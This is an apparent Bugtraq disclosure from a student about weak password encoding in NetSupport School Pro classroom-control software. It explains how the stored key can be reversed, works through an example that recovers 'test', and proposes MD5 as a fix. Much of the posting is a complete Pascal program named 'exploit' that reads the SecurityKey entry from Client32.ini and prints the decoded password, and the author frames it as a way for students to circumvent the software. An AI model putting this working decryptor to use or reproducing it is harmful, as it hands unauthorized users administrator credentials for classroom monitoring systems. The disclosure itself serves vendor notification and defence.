To the moderator, this is my first bugtraq posting, feel free to make any changes you feel nessessary to make this more helpful. Thank you very much Vendor : NetSupport URL : http://www.netsupport-inc.com/ Version : Invision NetSupport School Pro Risk : Password protection weakness Description: NetSupport School, market leading training tool for the modern classroom featuring full student remote control, application & internet monitoring, customized student testing and more. Password protection weakness: The password encryption method is a method which is easily reversed. The encryption method is as follows: The letters are expressed using a hexadecimal type of system. Every letter is shown by two characters the first character can be any ascii character while the second is in a range from a-p. This works just like hex in that ap+1=ba. Its not case sensitive so that also makes it easier for kids to get passes. The characters start at EM. So A= EM B=EN and so on. Each letter is also added to by the number of letters in front of it. So the crypt of aa= EN9O while the crypt of aaa=EO9P>A. I can figure the routine used for the crypt of each colum though. Here is a reference for the letter a and its crypt of each colum EM, 9O, >a, BC, FE, :G, >I, BK, FM, :O. Based on this knowledge and the hex-esque characters, and the addition to each char based on the amount of letters in front of it, you can get the password from an encrypted one. An example of a cracked password: The crypt is “GC;H@KEO” GC -3 = FP (according to the hexish system) FP=T so the first letter is T. Take 9O (known “a” for the 2nd column) and add the difference from a-t to it (19) and you get ;B add 2 to it (amount of letters in front of it) = ;D then subtract ;D from ;H you get 4 places. A+4 = E the second letter is “E” you continue to do this until you get the password “test” Solution: based on my research this program uses a hash type validation method, so the quickest and most painless solution would be to use the md5 routine for passwords. Credits: Credits go to Drexel University, and Harry Hoffman because if they hadn’t have used this software I would have never had the urge to circumvent it ;) As well as Mr. Flynn for teaching me pascal (even though its 20+ years old its still my favorite) Spiffomatic64 Hacking is an art-form Here is a program that will decrypt the password off of a machine with the software running: (old school :-D its written in pascal) program exploit; uses crt; var i,j,length,x,y,crazy:integer; passfile:text; line:string; password,p:array [1..100] of char; known,convert:array [1..26,1..3] of char; ch,tempx,tempy,key:char; procedure conv; begin convert[1,1]:='E'; convert[1,2]:='M'; convert[1,3]:='A'; for i:=2 to 26 do begin if convert[i-1,2]='P' then begin convert[i,1]:=chr(ord(convert[i-1,1])+1); convert[i,2]:='A'; end else begin convert[i,1]:=convert[i-1,1]; convert[i,2]:=chr(ord(convert[i-1,2])+1); end; convert[i,3]:=chr(ord(convert[i-1,3])+1); end; end; procedure hex(a,b:char; num:integer); begin if num>0 then begin for i:=1 to num do begin if b='P' then begin b:='A'; a:=chr(ord(a)+1); end else inc(b); end; end; if num<0 then begin for i:=-1 downto num do begin if b='A' then begin b:='P'; a:=chr(ord(a)-1); end else dec(b); end; end; tempx:=a; tempy:=b; end; function compare(a,b:char):char; begin for i:=1 to 26 do begin if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64); end; end; function diff(a,b,c,d:char):integer; var num1,num2,num3:integer; begin num1:=ord(a)*16+ord(b); num2:=ord(c)*16+ord(d); num2:=num2; diff:=num2-num1; end; Begin {get the hash from client32.ini} clrscr; Writeln(' _________________________________________________________'); Writeln('|NetSupport School Pro Password decryptor |'); Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|'); Writeln('|and my wonderful fiance Halley |'); Writeln(' ---------------------------------------------------------'); Writeln(''); assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini'); reset (passfile); i:=0; while not eof(passfile) do begin line:=''; while not EoLn(passfile) do begin Read(passfile, ch); line:=line+ch; if line='SecurityKey=' then begin while not eoln(passfile) do begin inc(i); read(passfile,ch); password[i]:=ch; end; length:=i; end; end; readln(passfile,line); end; write('Hash: '); for i:=1 to length do write(password[i]); writeln(''); {decrypt the hash} conv; known[1,1]:='E'; known[1,2]:='M'; known[2,1]:='9'; known[2,2]:='O'; known[3,1]:='>'; known[3,2]:='A'; known[4,1]:='B'; known[4,2]:='C'; known[5,1]:='F'; known[5,2]:='E'; known[6,1]:=':'; known[6,2]:='G'; known[7,1]:='>'; known[7,2]:='I'; known[8,1]:='B'; known[8,2]:='K'; known[9,1]:='F'; known[9,2]:='M'; known[10,1]:=':'; known[10,2]:='O'; known[11,1]:='?'; known[11,2]:='A'; known[12,1]:='C'; known[12,2]:='C'; known[13,1]:='G'; known[13,2]:='E'; known[14,1]:=';'; known[14,2]:='G'; known[15,1]:='?'; known[15,2]:='I'; {get the first char} for i:=1 to round(length/2) do p[i]:=chr(65); for x:=1 to round(length/2) do begin crazy:=0; crazy:=-(round(length/2))+x; for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65); hex(password[x*2-1],password[x*2],crazy); p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65); end; writeln(''); write('Password: '); for i:=1 to round(length/2) do begin write(p[i]); end; readkey; end. _________________________________________________________________ Get tax tips, tools and access to IRS forms – all in one place at MSN Money! http://moneycentral.msn.com/tax/home.asp